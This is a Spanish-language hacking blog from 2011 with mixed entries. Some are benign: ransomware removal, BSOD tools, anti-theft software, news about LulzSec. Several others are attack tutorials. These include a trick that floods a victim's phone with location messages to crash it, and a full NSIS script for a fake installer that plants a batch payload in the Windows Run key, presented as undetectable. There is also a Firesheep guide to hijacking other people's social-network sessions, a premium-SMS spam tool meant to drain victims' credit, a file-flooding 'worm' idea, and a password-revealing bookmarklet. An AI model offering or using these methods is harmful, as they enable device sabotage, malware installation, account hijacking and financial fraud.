Como sabeis existe la opción de Mandar ubicación, algo que tu movil, no tarda en procesar, pero que el otro movil tarda MUCHO en procesar. Simplemente mandas tu ubicación unas cuantas veces y el movil víctima se cuelga de lo lindo, y aunque lo apagues y lo vuelvas a encender, se siguen recibiendo esos mensajes, así que como se nos vaya la mano, podemos joder muchísimo. Las BlackBerry se cuelgan más que los Iphone, y los dispositivos con Android o Symbian.


Saludos y recordad, sed buenos :)

1 sept. 2011

[Tutorial]Malware oculto en rutina de instalación




Cuantas veces, instalamos programas sin hacer ni caso a los posibles virus que puedan contener, pues aprovechandome de eso, he creado un instalador que en vez de instalar un programa, te infecta un pequeño script malicioso( este se puede cambiar por un virus programado en otro lenguaje y por tanto más potente). Así que lo primero que hice fue bajarme el NSIS (Nullsoft Scriptable Install System)



Explico, NSIS es una herramienta de código abierto, que permite mediante scripts, crear instaladores típicos que se suelen usar en Windows.

<a href="http://imageshack.us/photo/my-images/231/nsisscreenshot5.png/" target="_blank"><img src="" border="0"/></a>

Al final me quedó un código de este tipo:

;NSIS Modern User Interface
;Basic Example Script - Se encuentra aquí: C:\Program Files\NSIS\Examples\Modern UI

;Lo tenemos que compilar desde la carpeta: C:\Program Files\NSIS\Examples\Modern UI
;--------------------------------
;Include Modern UI
  !include "MUI2.nsh"
;--------------------------------
;General
  ;Name and file
  Name "Installer"
  OutFile "Basic.exe"
  ;Default installation folder - Donde instalamos nuestro malware
  InstallDir "C:\Windows"

  ;Get installation folder from registry if available
  InstallDirRegKey HKLM "Software\Microsoft\Windows\CurrentVersion\Run\" "C:\Windows\config.bat"
  ;Request application privileges for Windows Vista
  RequestExecutionLevel user
;--------------------------------
;Interface Settings
  !define MUI_ABORTWARNING
;--------------------------------
;Pages
;Creamos una licencia que la pondremos junto a Basic.EXE que es el instalador
  !insertmacro MUI_PAGE_LICENSE "license.txt"
  !insertmacro MUI_PAGE_COMPONENTS
  !insertmacro MUI_PAGE_DIRECTORY
  !insertmacro MUI_PAGE_INSTFILES

  !insertmacro MUI_UNPAGE_CONFIRM
  !insertmacro MUI_UNPAGE_INSTFILES

;--------------------------------
;Languages

  !insertmacro MUI_LANGUAGE "Spanish"
Name "Example Program"
Caption "Darkc0de installer para Win32 Setup"
;--------------------------------
;Installer Sections
Section "Menu1" Sec1
  SetOutPath "$INSTDIR"

  ;ADD YOUR OWN FILES HERE...
  File config.bat
;Acabo de escribir la orden que hara que se extraiga nuestro malware, config.bat, en la ruta de instalación
  ;Store installation folder - O lo que es lo mismo, agregamos al inicio nuestro malware
  WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Run\" $INSTDIR "C:\Windows\config.bat"

  ;Create uninstaller
  WriteUninstaller "$INSTDIR\Uninstall.exe"
SectionEnd
Section "Menu2" Sec2
;Aqui podemos añadir mas
SectionEnd
;--------------------------------
;Descriptions
;Para crear los menus en el instalador
  ;Language strings
  LangString DESC_Sec1 ${LANG_SPANISH} "Primer menu "
LangString DESC_Sec2 ${LANG_SPANISH} "segundo menu "
  ;Assign language strings to sections
  !insertmacro MUI_FUNCTION_DESCRIPTION_BEGIN
    !insertmacro MUI_DESCRIPTION_TEXT ${Sec1} $(DESC_Sec1)
   !insertmacro MUI_DESCRIPTION_TEXT ${Sec2} $(DESC_Sec2)
  !insertmacro MUI_FUNCTION_DESCRIPTION_END
;--------------------------------
;Uninstaller Section - Por si se diera el caso que se desinstala xD
Section "Uninstall"
  ;ADD YOUR OWN FILES HERE...
  Delete "$INSTDIR\Uninstall.exe"
  RMDir "$INSTDIR"
  DeleteRegKey /ifempty HKCU "Software\Example"
SectionEnd

Lo he comentado más de lo que ya estaba, y aún he de aclarar, que para hacerlo correr se compilar desde la carpeta NSIS\Examples\Modern UI y después ya podemos usarlo en cualquier lado.

Yo he hecho esto:



Y con eso ya podemos tener la libertad de crear un malware en BATCH y meterlo en config.bat y ya está añadido al Inicio de Windows. Totalmente indetectable y con la apariencia de un instalador normal.

Ahora queda lo importante, modificarlo, para que parezca de verdad un instalador de un programa normal, como Ares, Winamp, etc...

Cualquier duda sobre el lenguaje Script que utiliza NSIS, o dudas sobre el tutorial en general, preguntad en la entrada.



25 ago. 2011

Firesheep, consigue cuentas de Facebook facilmente



Firesheep, es una extensión de Firefox. Que nos permite mediante simples scripts, robar las cookies de diferentes redes sociales, de los ordenadores conectados a la misma red LAN, lo cual nos permite acceder a la red social con su cuenta.

Vamos a instalar nuestra extensión en Windows, para lo cual primeramente necesitamos WinPCap, un paquete de librerías para la captura de datos. Lo podeis bajar aquí.
Nota: Si ya teneis instalado WireShark, ya lo teneis instalado.

Para Mac OS, se requiere versión 10.5 o superior.
Y en GNU/Linux, http://daraxblog.blogspot.com/2011/09/firesheep-ahora-en-gnulinux.html

Descarga de la extensión(se ha de abrir con Firefox): http://github.com/codebutler/firesheep/downloads

Cuando ya esté instalado, debemos hacer lo siguiente, Ver > Panel lateral > Firesheep.

Nos aparecera algo asi:


Para configurar Firesheep, nos vamos al botón de abajo y accedemos a las preferencias, donde podemos configurar las interfaces a las que conectarnos, en la segunda pestaña, podemos añadir algun script, para robar cookies de otras redes sociales, y por ultimo el puerto, que no es recomendable tocar, a no ser que uses proxy.

Cuando ya este configurado, le dais a Start capturing.. y os saldran distintas cookies de acceso, tal y como se muestra aquí:


Esto es todo por hoy, espero que ahora la gente sepa que eso de meterse en las redes sin contraseña, puede tener su riesgo.

21 ago. 2011

Como eliminar el virus de "La policía Española"

Desde hace unos dias, estamos sufriendo el acoso de un virus, que a simple vista parece una simple broma, pues nos aparece una imagen como está(o parecida):


Pero nos damos cuenta que no es una simple estafa, este virus, bloquea por completo las aplicaciones, desactiva el administrador de tareas, y cualquier combinación de teclas, tal como Windows + L, para cambiar usuario, este malware, se copia con diferentes nombres, y se puede encontrar en diversas rutas, como C:\Windows\Prefetch\readme[1].exe.pf, o en cualquier carpeta, de los usuarios.

Para eliminarlo:



1-Si estamos en Windows Vista o Windows 7, podemos intentar entrar con Ctrl+Alt+Supr a la pantalla de presentación, donde podemos cambiar de usuario, y desde ahí eliminar el proceso y pasar un antivirus. Esto en Windows XP no funciona, porque si apretamos Ctrl+Alt+Supr, nos sale un mensaje de que el Administrador de tareas esta desactivado(por el virus).

2- Entrar con un Live CD de cualquier distribución GNU/Linux, aquí os dejó la de Ubuntu, que es la distro más básica, http://www.ubuntu.com/download/ubuntu/download. con el LiveCD entramos a la partición donde este Windows y buscamos el archivo y lo eliminamos, iniciamos Windows y editamos la entrada del registro esta: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell donde se ubica, también es conveniente buscar en estas siguientes rutas del registro:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows
HKLM\System\CurrentControlSet\Control\Session Manager\KnownDLLs
HKLM\System\ControlSet001\Control\Session Manager\KnownDLLs/f


3- El siguiente paso por el momento, y hasta que los antivirus no incluyan la firma de este nuevo virus, es meterse en el Modo de símbolo de sistema, en Modo Seguro NO, porque el virus lo tiene también infectado, desde el símbolo del sistema, borramos el virus de alguna de estas rutas.

4- Para conseguir más tiempo, antes de que se bloquee el ordenador, solo basta con cambiar la hora en la bios. Se hace así, pulsa Supr o Del, y accederas al menu de la Bios, entras en Standard CMOS Features, y desde ahí retrasas 2 o 3 horas para tener más tiempo para arreglarlo.

El virus de La Pôlicía Española, tiene diversas formas, pero todas coinciden en efectos y en la forma de aparición, lo que no se sabe aún es su propagación.

Saludos y recordad que este tema se irá renovando.

19 ago. 2011

Poner un Form de carga al inicio de nuestra aplicación

Cuantas veces, instalamos un programa y nos sale, la típica imagen de carga con una barra de progreso, tipo esto:



Pues vamos a tener nosotros en nuestra aplicación exactamente lo mismo. Primero abrimos un proyecto nuevo, normal.

Y agregamos un PictureBox(y ponemos la imagen que queramos que nos salga), al Form que aparecerá al iniciar nuestro programa.

Un poco de código:

Private Sub Form_Load()
Picture1.AutoSize = True
Form1.Height = Picture1.Height
Form1.Width = Picture1.Width
End Sub

Esto ajustará perfectamente, el formulario, para que simplemente solo se vea la imagen de carga.

Yo he terminado haciendo esto:



Para descargar el proyecto completo:

http://www.megaupload.com/?d=K2NYBXXB

Saludos

17 ago. 2011

Agregar botón +1 de Google



Este botón al estilo +1 de FaceBook, significa exactamente lo mismo "Me gusta". Según palabras mismas de Google, este botón ayuda a amigos, y a personas que buscan lo mismo que tú. Esto en otras palabras, significa mejor posicionamiento y por tanto, más visitas.

Si queremos poner nuestro Botón +1 en nuestra web o blog, es algo muy sencillo.

Primer paso:


   <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>

Esta función se ha pegar justo después de la etiqueta de la plantilla del blog o en el codigo de la web.

Segundo paso:

Estos códigos se pegan donde quieras poner el botón. Pondre el codigo y arriba como aparece.



<g:plusone size="small"></g:plusone>


<g:plusone size="medium"></g:plusone>


<g:plusone size="standard"></g:plusone>


<g:plusone size="tall"></g:plusone>

Espero que os sirva para vuestros sitios. Los botones son funcionales, asi que podeis utilizarlos.

12 ago. 2011

SMS-Sender[VB6]


El programa en cuestión, manda masivamente SMS de anuncios de un coste de 1,42€/SMS + IVA. El programa permite mandar a muchos números, el número de SMS spam que queramos. Como máximo 50 pues el programa comienza a tardar demasiado. Esto puede hacer que una posible víctima pierda mucho saldo en poco tiempo.

Una nota importante es que cuando se cuelga el programa, es porque esta enviando, se dejan pasar unos minutos y saldrá una notificación de que ya estan los mensajes mandados.
Se requiere de una conexión a Internet.

Cada uno puede emplear este programa como quiera, no me hago responsable de su uso indebido.

Descarga SMS-Sender(Demo):


Para pedir la versión completa o el código fuente, contactad en este blog.

10 ago. 2011

Como desactivar los banners molestos.

Todos nos hemos encontrado alguna vez con alguno de esos banners que tienen sonido y molestan muchisimo. Estan los típicos de "Esto no es una broma. ¡Has ganado!", por supuesto los de citas "Haz click aquí y consigue tu mujer maravillosa" y por último, los de "Tienes un mensaje sin leer. ¿Quieres abrirlo?" (este es gracioso porque te dicen que tienes un mensaje nuevo en una página porno,¿cómo se explica eso?).





Para evitar todo esto existen complementos para nuestros navegadores, no importa si es Mozilla Firefox o Google Chrome existen para ambos.
Mi recomendación es usar AdBlocks, sinceramente, me parece la mejor extensión creada para evitar la publicidad.


Los tres son buenas herramientas que aumentaran la velocidad de navegación y bloquearán esos molestos y ruidosos anuncios.



20 jul. 2011

Pepsi Music Maker[Descarga gratuita]

Pepsi Music Maker, es un software de edición de audio, multipista, para Microsoft Windows creado por la compañía alamana MAGIX. Este programa esta destinado para los usuarios que empiezan con la creacion de musica.

Este programa se consigue comprando una lata de dicho refresco, y con la clave que esta en la anilla de la lata. Pero lo he subido, para que todo el mundo pueda tenerlo. Simplemente hay que registrar y ya se puede disfrutar de este programa que es muy útil para gente que no ha tenido contacto con programas de edición de audio.


El enlace estaba en MegaUpload, buscaré otro link para arreglarlo.


Aparte de esto, con este programa puedes con una cancion creada con el mismo, acceder a una votación..y poder ganar premios y viajes.

Espero que este programa inicie nuevos DJ's.

26 jun. 2011

¿Qué hacer si te roban tu portatil?

¿Te han robado tu portátil, y sabes que la policía no va a encontrarlo? ¿Lo has perdido, y sabes que tu tampoco lo vas a encontrar?
Son posibilidades que ocurren cuando usas el portátil fuera de casa, por ello existe un software que te ayudará a recuperarlo.



Este programa de código abierto permite tener controlado el ordenador en caso de que desaparezca. Disponible para Windows, MAC, Linux y Android. En la instalación te has de registrar(no dura más de dos minutos) y a partir de ahí, en la web tienes un panel de control muy completo, donde podemos reportar que se ha robado nuestro portátil, en ese instante comienzan a funcionar todo esto:

  • Geolocalización: Prey usa el servicio GPS o triangula, la posición de la señal  WiFi a la que se conecte el portátil. En el panel de control, te aparecerá al estilo Google Maps su ubicación exacta.

  • Webcam: Prey usa la webcam para hacer fotos cada cierto tiempo, para poder así visualizar el sitio, o la persona que lo está usando en ese momento.

  • Capturas de pantalla: Al igual que con la webcam, Prey, hace capturas de pantalla con una frecuencia establecida, para saber que esta haciendo la persona que usa el portátil.
  • Ligero y estable, no consume demasiados recursos.

  • Protección: Prey oculta datos personales, contraseñas, correos de Outlook y ThunderBird.. evitando así que el intruso se haga con información valiosa.

  • Bloqueo: El programa bloquea el ordenador, si lo deseas desde el panel de control, requiriendo una contraseña a la persona que está en posesión del portátil.

  • Todo esto se desarrolla, sin que el "ladrón" pueda saber siquiera que estamos recopilando toda esta información..

Descarga:

Windows
Ubuntu
MAC/OS
GNU/Linux (todas las distribuciones)
Android

25 jun. 2011

Usando CreateFile


Es una técnica muy sencilla pero que puede resultar muy util. Nos puede permitir crear "ejecutables maliciosos" que creen archivos durante un tiempo ilimitado..

Empezaremos con crear un archivo con un nombre aleatorio.Para luego crear un bucle.

http://freetexthost.com/xnrp3cj00b (Aqui esta el code en C)

Como se ve no es nada del otro mundo.
La funcion CreateFile nos permite abrir o crear un nuevo archivo según modifiquemos el par?metro dwCreationDisposition [in] .
+ información

Y lo mismo con WriteFile, nos permite cuantos bytes escribir en los archivos y ponerle el nombre.
+ información

Bueno ahora nos saldrá un archivo con nombre aleatorio, y de tamaño 63,9 KB, porque tan poco para un worm, porque esto nos permite crear archivos rapidamente y a la larga sera más eficiente.

Para crear el worm solo necesitamos un bucle en int main.

Un ejemplo para crear solo 3 archivos.

http://freetexthost.com/ltrk4gqat0 (Code en C)

Podemos usar while(true) o for(;;)

Eso ya es imaginación suya.

20 jun. 2011

Lulzsec y Anonymous



Los grupos de hackers Lulzsec y Anonymous están en guerra civil. Lulzsec está convencido de que un aviso para denunciar a sus miembros ante el FBI es de gente de 4chan, una de las plataformas utilizadas por Anonymous para organizar sus acciones. Siempre a través de Twitter, Lulzsec ha iniciado la emisión de mensajes contra Anonymous en un lenguaje un tanto críptico. De uno de ellos se deduce que ha llegado a lanzar un ataque contra 4chan.


El 12 de junio, Lulzsec ya lanzó un mensaje en la citada red social en la que marcaba sus diferencias con Anonymous. "Si quieres ética ve a llorar a Anonymous. Los verdaderos lulzfans esperan el siguiente día para tener más diversión".

Lulzsec, que algunos analistas consideran un grupo desgajado de Anonymous, siempre ha reivindicado que sus acciones tiene un único motivo: divertirse. Ello les diferenciaría de Anonymous que justifican sus asaltos por razones ideológicas. El ataque a servidores y empresas de juegos por parte de Lulzsec, por ejemplo, no es compartido por Anonymous.

La última acción conocida de Lulzsec ha sido el ataque a un empresa australiana dedicada al resgistro de dominios. El botín conseguido es una lista de 62.000 direcciones de correo y contraseñas.

Ambos grupos emplean mayoritariamente el mismo sistema de ataque: la denegación de servicio (colapso de servidores gracias al envío simultáneo de miles de peticiones). A Lulzsec se le atribuye el ataque de esta semana a la web de la CIA abierta a los internautas, que permaneció inactiva durante unos minutos, y a la del Senado de Estados Unidos. También ha reivindicado que hace un par de meses asaltó la sede digital de la compañía de videojuegos Bethesda, editora de Brink. LulzSec -cuyo nombre mezcla el concepto "lulz", risas a costa de la víctima de una broma, y "sec" de seguridad- asegura que ha conseguido datos personales de 200.000 jugadores de Brink. Igualmente ha estado detrás de varios ataques a Sony. Uno de ellos, implicó el robo según Lulzsec de un millón de datos de afiliados a sonypictures.com, cifra que Sony rebajó sensiblemente. Fox y la televisión pública de EE UU han sido otros de sus objetivos.

Twitter: https://twitter.com/#!/LulzSec

23 abr. 2011

Utilidades para leer los pantallazos azules.

Empiezo poniéndoos brevemente lo que es la Blue Screen Of Death:

La llamada Blue Screen of Death o BSoD (más conocida en español como pantalla azul de la muerte o «pantallazo azul»), hace referencia a la pantalla mostrada por el sistema operativo Windows de Microsoft cuando no puede (o está en peligro de no poder) recuperarse de un error de sistema.


Hay un par de herramientas forenses que son de gran ayuda para descubrir lo que hay detrás de los pantallazos azules: BlueScreenView y WhoCrashed. Ambas analizan el directorio C:\Windows\minidump en busca de volcados de memoria, las huellas que dejan los errores graves. En el caso de BlueScreenView, incluso se recrea al aspecto del pantallazo original:


El otro programa es WhoCrashed, después de sufrir un pantallazo azul WhoCrashed analizará los archivos de volcado disponible en su equipo y creará una conclusión. Se le informará sobre los drivers responsables y ofrecerá sugerencias sobre cómo proceder.


Otros consejos después de pasar una BSOD:

  • Restaurar sistema es la solución a los conflictos causados por programas y controladores recién instalados.
  • Escanear el disco duro en busca de errores también es buena idea. Usa los comandos Chkdsk y Fixmbr.
  • Conviene comprobar la integridad de los archivos de sistema. Ejecuta el comando SFC /scannow.
  • Usa un antivirus en CD arrancable para limpiar posibles infecciones.
  • Los módulos de RAM defectuosos son una fuente inagotable de fallos. Búscalos con Memtest86+.

21 ene. 2011

Insurance.AES-256 Decrypted



Por fin...he conseguido, después de varias horas...nada.

Si, es casi imposible a día de hoy desencriptar un fichero cifrado con AES-256.
Solo con decir que no se ha encontrado ningún ataque exitoso contra este tipo de cifrado, voy a explicaros el porqué.

Bueno empezaré poniéndoos un ejemplo con ordenadores de estar por casa..Un ordenador moderno con un procesador del tipo Intel i5 o AMD Athlon 64 puede llegar a tener 2.5 GhZ a 3 Ghz, aproximadamente, lo que equivale a 10-15 GFlops. (FLOPS = Operaciones de punto flotante por segundo)
Sabiendo que con la mayor nube de computación, folding@home, que tiene sobre 4.5 PetaFlops, puede crackear 200 mil millones de contraseñas por segundo.
Sabiendo esto, podremos conseguir la clave del conocido archivo insurance.aes256, en tan solo 145 mil millones de años...quizás no nos guste tanto esperar, si consiguiéramos unir todas las supercomputadoras, conseguiríamos sobre 40 PetaFlops, solo esperaríamos 3200 millones de años.

En conclusión, si queremos conseguir algo decente como unos días o incluso un mes deberíamos multiplicar la capacidad por 3200 millones, cosa que cuando llegue ese día todos habremos muerto.

Así que Julian Assange, a no ser que se descubra un vulnerabilidad en ese cifrado(que es posible), si por fuerza bruta se tratara, puede dormir muy tranquilo, sabiendo que su archivo es seguro.

4 ene. 2011

Conseguir contraseña oculta con asteriscos.

Lo primero, felicitar a todo el mundo la navidad, los reyes, el año nuevo, y todo lo que queráis.

Después de tanto sin escribir una entrada, hoy traigo un regalo que seguro que ya es conocido, pero a mi me sirve muchísimo.

Cuando vemos esto:



Tenemos en nuestro ordenador la contraseña guardada, pero las webs ocultan estas con asteriscos o puntos, para evitar que se vean. Por tanto si ponemos en nuestra barra de direcciones este código:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Claves encontradas:\n\n" + s); else alert("No hay claves");})();

Y así nos sale un formulario como este:

Arriba